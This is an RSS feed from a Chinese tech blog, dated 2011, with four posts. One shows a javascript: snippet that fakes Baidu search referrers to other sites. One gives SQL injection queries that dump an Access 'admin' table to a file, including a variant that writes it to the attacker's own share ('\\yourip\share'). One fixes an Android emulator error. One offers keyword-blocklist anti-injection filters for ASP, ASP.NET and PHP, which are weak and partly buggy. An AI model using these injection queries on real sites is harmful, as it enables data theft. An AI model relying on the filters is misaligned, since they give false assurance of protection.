<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>财务|税务|计算机|软件|表格</title><link>http://www.xesee.com/</link><description>智思阁</description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>惠安惟信会计培训中心旗下网站 版权所有 | CopyRight weixinkj.com &amp;amp;copy;2010-2011 All Rights Reserved. | Archiver本站所有文章除注明外，均为原创。转载请注明出自〖智思阁www.xesee.com〗!浙ICP备10206399号</copyright><pubDate>Mon, 05 Dec 2011 01:18:07 +0800</pubDate><item><title>搜索引擎关键词模拟点击及其实现方法</title><author>union@zesee.com (onesee)</author><link>http://www.xesee.com/post/monidianji.html</link><pubDate>Tue, 29 Nov 2011 12:24:24 +0800</pubDate><guid>http://www.xesee.com/post/monidianji.html</guid><description><![CDATA[晚上想起来以前玩过一种手法，叫做“模拟关键词”，下面我详细给大家讲解一下：<br/>1、思路与目的：在百度或其他搜索引擎上输入关键词跳转到指定的地址。<br/>    打开百度，输入关键词比如“淘壶人”或者“<a href="http://www.taohuren.com" target="_blank">紫砂壶</a>”，出来搜索结果，不用理会，在地址栏贴入：<br/><br/><p class="code"><code>javascript:void(0);document.write("&lt;a&nbsp;href='http://www.taohuren.com'&nbsp;target='_blank'&gt;点此打开页面&lt;/a&gt;");</code></p><br/>2、结果与分析，当你执行完上面的代码并点击后，即给你的网站，带来了一个从百度过来的你指定的关键词的来路。<br/>实现原理就是流量统计器，分析了来路的页面地址与关键词，从而达到了模拟关键词的目的。<br/><br/>3、高级应用：如果你是一个新站，比如你的名字叫“淘壶人”，你想让很多人知道你。你可以找很多的小站（天天会关注来路及关键词的），依次操作：<br/>    A、在百度上搜索你要打响的名号，比如“淘壶人”；<br/>    B、将很多小站整理成像“1、思路与目的”所提的格式，点开那个连接，就给那个站带去一个关键词和百度的来路。循环操作，就给每个站都带去这样的去路。小站长看到这样的关键词来路，一般都会回点到百度。就给你创造一次搜索啦！同时也提高了知名度！<br/><br/>4、变态玩法：就是在百度输入“XXX你好帅”或其他泄愤之类的关键词，然后给他去个来路。站长看了，肯定很吃惊！<br/><br/>PS：赶紧试试吧，希望大家多给我来点来路“紫砂壶”到http://www.taohuren.com，谢谢！转载请保留链接！<p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/monidianji.html" target="_blank">继续阅读《搜索引擎关键词模拟点击及其实现方法》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/computer.html">电脑专业</a> | Tags: <a href="http://www.xesee.com/catalog.asp?tags=%E7%B4%AB%E7%A0%82%E5%A3%B6">紫砂壶</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E">搜索引擎</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=%E5%85%B3%E9%94%AE%E8%AF%8D">关键词</a>&nbsp;&nbsp;<a href="http://www.xesee.com/catalog.asp?tags=%E6%A8%A1%E6%8B%9F%E7%82%B9%E5%87%BB">模拟点击</a>&nbsp;&nbsp; | <a href="http://www.xesee.com/post/monidianji.html#comment" target="_blank">添加评论</a>(1)</p><h3>相关文章:</h3><ul><li><a href="http://www.xesee.com/post/keywords.html">关键词/关键字排名在线查询工具</a> (2009-7-4 12:10:29)  </li></ul>]]></description><category>电脑专业</category><comments>http://www.xesee.com/post/monidianji.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=433</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=433&amp;key=b2bdf69f</trackback:ping></item><item><title>emulator: ERROR: unknown virtual device name</title><author>union@zesee.com (onesee)</author><link>http://www.xesee.com/post/432.html</link><pubDate>Thu, 28 Apr 2011 15:35:43 +0800</pubDate><guid>http://www.xesee.com/post/432.html</guid><description><![CDATA[运行Android SDK and AVD Manager（安卓模拟器）时，出现：<br/><p class="code"><code>emulator:&nbsp;ERROR:&nbsp;unknown&nbsp;virtual&nbsp;device&nbsp;name:&nbsp;‘test’<br/>emulator:&nbsp;could&nbsp;not&nbsp;find&nbsp;virtual&nbsp;device&nbsp;named&nbsp;‘test’</code></p><b>Win7</b>用户的解决方法：<br/>把D:\.android目录完整地复制到C:\Users\Administrator下。<br/><br/><b>Xp</b>用户的解决方法：<br/>把D:\My Documents\.android目录完整地复制到C:\Documents and Settings\Administrator下。<br/><br/>产生这个问题的原因是创建OVD的命令和OVD分别调用了不同的Windows API获取用户的主目录，前者获取的是当前用户主目录“D:\.android”（XP为：“D:\My Documents\.android”），而后者获取的是所有用户的主目录“C:\Users\Administrator”（XP为：“C:\Documents and Settings\Administrator”）。<br/>原理明白后，大家酌情处理一下，就好了。<p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/432.html" target="_blank">继续阅读《emulator: ERROR: unknown virtual device name》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/computer.html">电脑专业</a> | Tags:  | <a href="http://www.xesee.com/post/432.html#comment" target="_blank">添加评论</a>(0)</p><p><a href="http://www.xesee.com/post/432.html#comment" target="_blank">还没有相关文章，您来说两句？</a></p>]]></description><category>电脑专业</category><comments>http://www.xesee.com/post/432.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=432</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=432&amp;key=772bb2fd</trackback:ping></item><item><title>利用SQL注入Access导出数据库内容到文本文件</title><author>union@zesee.com (onesee)</author><link>http://www.xesee.com/post/431.html</link><pubDate>Sun, 24 Apr 2011 01:06:03 +0800</pubDate><guid>http://www.xesee.com/post/431.html</guid><description><![CDATA[网上就流传利用SQL注入Access导出数据库内容到文本文件（可导出txt、htm、html等格式）的方法： <br/><br/><p class="code"><code>SELECT&nbsp;*&nbsp;into&nbsp;[test.txt]&nbsp;in&nbsp;'d:\web\'&nbsp;'text;'&nbsp;from&nbsp;admin</code></p><br/><br/>执行上述语句，在d:\web目录下就会生成test.txt文件，其内容就是表admin的内容。但是导出asp格式就不行，会说“不能更新，数据库或对象为只读”。 <br/><br/>其实控制导出文件后缀是存储在注册表的，具体键值是<br/><p class="code"><code>HKEY_LOCALMACHINE\Software\Microsoft\Jet\4.0\Engines\Text\DisableExtension</code></p>默认情况下值为<br/><p class="code"><code>!txt,csv,tab,asc,tmp,htm,html</code></p>如果我们把asp也添加进去的话，呵呵，就可以导出asp格式的文件了。 <br/><br/>这个方法跟那个调用Access的Shell函数执行命令一样，要修改注册表，所以利用不是很大。 <br/><br/>顺便提一下，前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦：<br/><p class="code"><code>SELECT&nbsp;*&nbsp;into&nbsp;[test.txt]&nbsp;in&nbsp;'\\yourip\share'&nbsp;'text;'&nbsp;from&nbsp;admin<br/>SELECT&nbsp;*&nbsp;into&nbsp;[test.txt]&nbsp;in&nbsp;'D:\Inetpub\wwwroot\test\cnhcdz'&nbsp;'text;'&nbsp;from&nbsp;web_admin</code></p><p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/431.html" target="_blank">继续阅读《利用SQL注入Access导出数据库内容到文本文件》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/computer.html">电脑专业</a> | Tags:  | <a href="http://www.xesee.com/post/431.html#comment" target="_blank">添加评论</a>(0)</p><p><a href="http://www.xesee.com/post/431.html#comment" target="_blank">还没有相关文章，您来说两句？</a></p>]]></description><category>电脑专业</category><comments>http://www.xesee.com/post/431.html#comment</comments><wfw:comment>http://www.xesee.com/</wfw:comment><wfw:commentRss>http://www.xesee.com/feed.asp?cmt=431</wfw:commentRss><trackback:ping>http://www.xesee.com/cmd.asp?act=tb&amp;id=431&amp;key=d6ba842d</trackback:ping></item><item><title>防注入代码（ASP/ASP.NET/PHP三种代码）</title><author>union@zesee.com (onesee)</author><link>http://www.xesee.com/post/防注入代码.html</link><pubDate>Fri, 08 Apr 2011 22:31:00 +0800</pubDate><guid>http://www.xesee.com/post/防注入代码.html</guid><description><![CDATA[先来个简单的，ASP代码：<br/><br/><p class="code"><code>&lt;%<br/>'Dim&nbsp;XeSeeinje_Post,XeSeeinje_Get,XeSeeinje_In,XeSeeinje_Inf,XeSeeinje_Xh,XeSeeinje_db,XeSeeinje_dbstr<br/><br/>'您可以在XeSeeinje_In中新增要过滤的参数，用#号隔开<br/>XeSeeinje_In&nbsp;=&nbsp;"'#;#and#exec#insert#select#delete#update#count#chr#mid#master#truncate#char#declare"<br/>XeSeeinje_Inf&nbsp;=&nbsp;split(XeSeeinje_In,"#")<br/><br/>'判断post参数<br/>If&nbsp;Request.Form&lt;&gt;""&nbsp;Then&nbsp;StopInjection(Request.Form)<br/>'判断get参数<br/>If&nbsp;Request.QueryString&lt;&gt;""&nbsp;Then&nbsp;StopInjection(Request.QueryString)<br/>'判断cookies参数<br/>If&nbsp;Request.Cookies&lt;&gt;""&nbsp;Then&nbsp;StopInjection(Request.Cookies)<br/><br/><br/>Function&nbsp;StopInjection(values)<br/>For&nbsp;Each&nbsp;XeSeeinje_Get&nbsp;In&nbsp;values<br/>For&nbsp;XeSeeinje_Xh=0&nbsp;To&nbsp;Ubound(XeSeeinje_Inf)<br/>If&nbsp;Instr(LCase(values(XeSeeinje_Get)),XeSeeinje_Inf(XeSeeinje_Xh))&lt;&gt;0&nbsp;Then<br/>Response.Write&nbsp;"&lt;Script&nbsp;Language=JavaScript&gt;alert('防注入系统提示你：\n\n请不要在参数中包含非法字符。');&lt;/Script&gt;"<br/>Response.Write&nbsp;"非法操作！系统已经给你做了如下记录：&lt;br&gt;"<br/>Response.Write&nbsp;"操作IP："&Request.ServerVariables("REMOTE_ADDR")&"&lt;br&gt;"<br/>Response.Write&nbsp;"操作时间："&Now&"&lt;br&gt;"<br/>Response.Write&nbsp;"操作页面："&Request.ServerVariables("URL")&"&lt;br&gt;"<br/>Response.Write&nbsp;"提交数据："&values(XeSeeinje_Get)<br/>Response.End<br/>End&nbsp;If<br/>Next<br/>Next<br/>End&nbsp;Function<br/><br/>%&gt;<br/></code></p>复制该程序到您的网站中的公共页面里，如conn.asp，您可以根据需要自行对该程序进行修改。 <br/><br/><br/>第二种，asp.net代码（适用多种版本）：<br/><p class="code"><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&nbsp;&lt;summary&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;在&nbsp;Application_BeginRequest中加入函数StartProcessRequest()<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&nbsp;&lt;/summary&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;protected&nbsp;void&nbsp;Application_BeginRequest(Object&nbsp;sender,&nbsp;EventArgs&nbsp;e)<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;StartProcessRequest();<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/><br/>#region&nbsp;SQL注入式攻击代码分析&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&nbsp;&lt;summary&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;处理用户提交的请求&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&nbsp;&lt;/summary&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;private&nbsp;void&nbsp;StartProcessRequest()&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;string&nbsp;getkeys&nbsp;=&nbsp;"";&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;string&nbsp;sqlErrorPage&nbsp;=&nbsp;"/default.aspx";//如果有非法参数,转向的错误提示页面&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(System.Web.HttpContext.Current.Request.QueryString&nbsp;!=&nbsp;null)&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;(int&nbsp;i&nbsp;=&nbsp;0;&nbsp;i&nbsp;&nbsp;&lt;&nbsp;System.Web.HttpContext.Current.Request.QueryString.Count;&nbsp;i++)&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;getkeys&nbsp;=&nbsp;System.Web.HttpContext.Current.Request.QueryString.Keys[i];&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!ProcessSqlStr(System.Web.HttpContext.Current.Request.QueryString[getkeys]))&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;System.Web.HttpContext.Current.Response.End();&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(System.Web.HttpContext.Current.Request.Form&nbsp;!=&nbsp;null)&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;(int&nbsp;i&nbsp;=&nbsp;0;&nbsp;i&nbsp;&nbsp;&lt;&nbsp;System.Web.HttpContext.Current.Request.Form.Count;&nbsp;i++)&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;getkeys&nbsp;=&nbsp;System.Web.HttpContext.Current.Request.Form.Keys[i];&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(getkeys&nbsp;==&nbsp;"__VIEWSTATE")&nbsp;continue;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!ProcessSqlStr(System.Web.HttpContext.Current.Request.Form[getkeys]))&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;System.Web.HttpContext.Current.Response.End();&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(System.Web.HttpContext.Current.Request.Cookies&nbsp;!=&nbsp;null)&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;(int&nbsp;i&nbsp;=&nbsp;0;&nbsp;i&nbsp;&nbsp;&lt;&nbsp;System.Web.HttpContext.Current.Request.Cookies.Count;&nbsp;i++)&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;getkeys&nbsp;=&nbsp;System.Web.HttpContext.Current.Request.Cookies.Keys[i];&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!ProcessSqlStr(System.Web.HttpContext.Current.Request.Cookies[getkeys].ToString()))&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;System.Web.HttpContext.Current.Response.End();&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;catch&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;错误处理:&nbsp;处理用户提交信息!&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&nbsp;&lt;summary&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;分析用户请求是否正常&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&nbsp;&lt;/summary&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&nbsp;&lt;param&nbsp;name="Str"&gt;传入用户提交数据&nbsp;&nbsp;&lt;/param&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;///&nbsp;&nbsp;&lt;returns&gt;返回是否含有SQL注入式攻击代码&nbsp;&nbsp;&lt;/returns&gt;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;private&nbsp;bool&nbsp;ProcessSqlStr(string&nbsp;Str)&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;bool&nbsp;ReturnValue&nbsp;=&nbsp;true;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(Str.Trim()&nbsp;!=&nbsp;"")&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;string&nbsp;SqlStr&nbsp;=&nbsp;"and&nbsp;|exec&nbsp;|insert&nbsp;|select&nbsp;|delete&nbsp;|update&nbsp;|count&nbsp;|*&nbsp;|chr&nbsp;|mid&nbsp;|master&nbsp;|truncate&nbsp;|char&nbsp;|declare";&nbsp;&nbsp;<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;string[]&nbsp;anySqlStr&nbsp;=&nbsp;SqlStr.Split('|');&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;foreach&nbsp;(string&nbsp;ss&nbsp;in&nbsp;anySqlStr)&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(Str.ToLower().IndexOf(ss)&nbsp;&gt;=&nbsp;0)&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ReturnValue&nbsp;=&nbsp;false;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;catch&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ReturnValue&nbsp;=&nbsp;false;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;ReturnValue;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;#endregion&nbsp;<br/></code></p>如果您的程序是asp.net程序，你可以 点击这里 查看asp.net防注入代码。 <br/>复制该程序到您的网站程序中的Global.asax里，重新编译程序。 <br/>您同样可以根据需要自行对该程序进行修改。 <br/><br/>再来个PHP版的吧：<br/><p class="code"><code>&lt;?php<br/><br/>function&nbsp;dowith_sql($str)<br/>{<br/>&nbsp;&nbsp;&nbsp;&nbsp;$refuse_str="and|or|select|update|from|where|order|by|*|delete|'|insert|into|values|create|table|database";<br/>&nbsp;&nbsp;&nbsp;&nbsp;$arr=explode("|",$refuse_str);<br/>&nbsp;&nbsp;&nbsp;&nbsp;for($i=0;$i&lt;count($arr);$i++)<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//$replace="[".$arr[$i]."]";<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//$str=str_replace($arr[$i],$replace,$str);<br/>&nbsp;&nbsp;if(strpos($str,$arr[$i])!=false)<br/>&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;"&lt;Script&nbsp;Language=JavaScript&gt;alert('防注入系统提示你：请不要在参数中包含非法字符。');&lt;/Script&gt;";<br/>&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;"非法操作！系统已经给你做了如下记录：&lt;br&gt;";<br/>&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;"操作IP：".$_SERVER["REMOTE_ADDR"]."&lt;br&gt;";<br/>&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;"操作时间：".$_SERVER["REQUEST_TIME"]."&lt;br&gt;";<br/>&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;"操作页面：".$_SERVER["SCRIPT_NAME"]."&lt;br&gt;";<br/>&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;"提交数据：".$str;<br/>&nbsp;&nbsp;&nbsp;&nbsp;exit();<br/>&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;$str;<br/>}<br/>foreach&nbsp;($_GET&nbsp;as&nbsp;$key=&gt;$value)<br/>{<br/>&nbsp;&nbsp;&nbsp;&nbsp;$_GET[$key]=dowith_sql($value);<br/>&nbsp;&nbsp;&nbsp;&nbsp;<br/>}<br/>foreach&nbsp;($_POST&nbsp;as&nbsp;$key=&gt;$value)<br/>{<br/>&nbsp;&nbsp;&nbsp;&nbsp;$_POST[$key]=dowith_sql($value);<br/>&nbsp;&nbsp;&nbsp;&nbsp;<br/>}<br/>?&gt;<br/></code></p><br/>如果您的程序是php程序，复制该程序到您的网站中的公共页面里，如conn.php。 <br/><br/>三种语言的防注入就介绍到这里啦。希望对你有帮助！<p>Copyright © 2008</p><p><a href="http://www.xesee.com/post/防注入代码.html" target="_blank">继续阅读《防注入代码（ASP/ASP.NET/PHP三种代码）》的全文内容...</a></p><p>分类: <a href="http://www.xesee.com/post/computer.html">电脑专业</a> | Tags: <a 